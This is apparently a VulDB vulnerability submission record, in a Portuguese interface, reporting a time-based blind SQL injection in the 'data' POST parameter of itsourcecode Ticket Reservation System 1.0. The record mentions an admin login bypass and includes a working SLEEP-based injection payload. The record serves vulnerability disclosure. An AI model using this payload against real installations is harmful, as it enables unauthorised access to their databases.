Submeter #383644: itsourcecode Ticket Reservation System 1.0 SQLi checkout_ticket_save.phpinformação

Títuloitsourcecode Ticket Reservation System 1.0 SQLi checkout_ticket_save.php
DescriçãoBy exploiting a universal password vulnerability to log into the admin backend, an SQL injection vulnerability occurs on the "checkout_ticket_save.php" page due to the lack of strict filtering of the data parameter. --------------POC-------------- Parameter: data (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: data=123' AND (SELECT 7295 FROM (SELECT(SLEEP(5)))zbyg) AND 'JWwh'='JWwh
Fonte⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE10-2.md
Utilizador
 Dee.Mirage (UID 71702)
Submissão31/07/2024 07h22 (há 2 anos)
Moderação02/08/2024 23h43 (3 days later)
EstadoAceite
Entrada VulDB273530 [itsourcecode Ticket Reservation System 1.0 checkout_ticket_save.php data Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!